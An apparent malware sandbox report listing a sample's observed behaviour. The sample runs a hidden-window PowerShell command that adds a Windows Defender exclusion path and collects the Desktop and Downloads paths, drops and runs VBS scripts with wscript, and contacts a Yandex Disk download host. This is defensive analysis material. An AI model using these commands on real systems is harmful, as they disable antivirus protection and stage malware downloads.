Technical Information
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%'; $desktopPath = [Environment]::GetFolderPath('Desktop'); $downloadsPath = [Environment]::GetFolderPath('UserProfile') + '\Downloads...
- %WINDIR%\syswow64\windowspowershell\v1.0\temp1.vbs
- %WINDIR%\syswow64\windowspowershell\v1.0\temp2.vbs
- %WINDIR%\syswow64\test.txt
- 'downloader.disk.yandex.ru':443
- 'downloader.disk.yandex.ru':443
- DNS ASK downloader.disk.yandex.ru
- '%WINDIR%\syswow64\wscript.exe' temp1.vbs
- '%WINDIR%\syswow64\wscript.exe' temp2.vbs
- '%WINDIR%\syswow64\notepad.exe' <SYSTEM32>\test.txt
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%'; $desktopPath = [Environment]::GetFolderPath('Desktop'); $downloadsPath = [Environment]::GetFolderPath('UserProfile') + '\Downloads...' (with hidden window)